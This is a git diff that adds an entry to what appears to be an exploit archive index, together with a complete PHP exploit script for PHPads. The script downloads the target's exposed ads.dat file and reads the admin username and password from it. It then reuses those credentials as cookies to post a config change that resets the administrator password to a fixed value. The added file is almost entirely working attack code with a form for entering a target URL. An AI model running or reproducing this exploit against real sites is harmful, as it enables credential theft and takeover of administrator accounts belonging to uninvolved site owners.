diff --git a/files.csv b/files.csv
index d005aa57c..7850f3177 100755
--- a/files.csv
+++ b/files.csv
@@ -32012,6 +32012,7 @@ id,file,description,date,author,platform,type,port
 35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.lst)",2014-12-15,s-dz,windows,local,0
 35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
 35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0
+35535,platforms/php/webapps/35535.php,"PHPads <= 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0
 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x / 4.1.x / 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0
 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
 35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0
diff --git a/platforms/php/webapps/35535.php b/platforms/php/webapps/35535.php
new file mode 100755
index 000000000..7acb737c1
--- /dev/null
+++ b/platforms/php/webapps/35535.php
@@ -0,0 +1,61 @@
+<title> PHPads Authentication Bypass  Exploit </title>
+<pre>
+PHPads Authentication Bypass / Administrator Password Change Exploit
+<form method="POST">
+Target  : <br><input type="text" name="target" value="<? if($_POST['target']) {echo $_POST['target']; }else{echo 'http://localhost:4545/phpads';} ?>" size="70" /><br /><input type="submit" name="submit" />
+</form>
+<?php
+function catchya($string, $start, $end)
+{
+	preg_match('/'.$start.'(.*)'.$end.'/', $string, $matches);
+	return $matches[1];
+}
+
+function login($target)
+{
+	$ch = curl_init();
+    curl_setopt($ch, CURLOPT_URL,$target."/ads.dat");
+    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
+	$result = curl_exec($ch);
+	$username = catchya($result, "user=", "\n");
+	$password = catchya($result, "pass=", "\n");
+	return array($username,$password);
+	curl_close($ch);
+}
+
+function adminchange($target, $username, $password)
+{
+	$post = array('save' => '1',
+	'newlogin' => $username,
+	'newpass' => "htlover");
+	$ch = curl_init();
+    curl_setopt($ch, CURLOPT_URL,$target);
+    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
+	curl_setopt($ch, CURLOPT_COOKIE, 'user='.$username.'; pass='.$password);
+	curl_setopt($ch,CURLOPT_POST,true);
+    curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
+	$result = curl_exec($ch);
+	if(preg_match("/Code Generator/", $result))
+	{
+		return "<br><br><font color=green>Success !! Password changed </font><br>username: ".$username." | password: htlover";
+	}else{
+		return "Something wrong <br>";
+	}
+	curl_close($ch);
+}
+
+if (isset($_POST['submit']))
+{
+	$target = $_POST['target'];
+	//login($target, $username, $userid);
+	$logins = login($target);
+	echo "USERNAME :" . $logins[0]; // username
+	echo "<br>PASSWORD :" . $logins[1]; // password
+	echo adminchange($target.'/admin.php?action=config', $logins[0], $logins[1]);
+}
+
+
+
+
+?>
+</pre>
\ No newline at end of file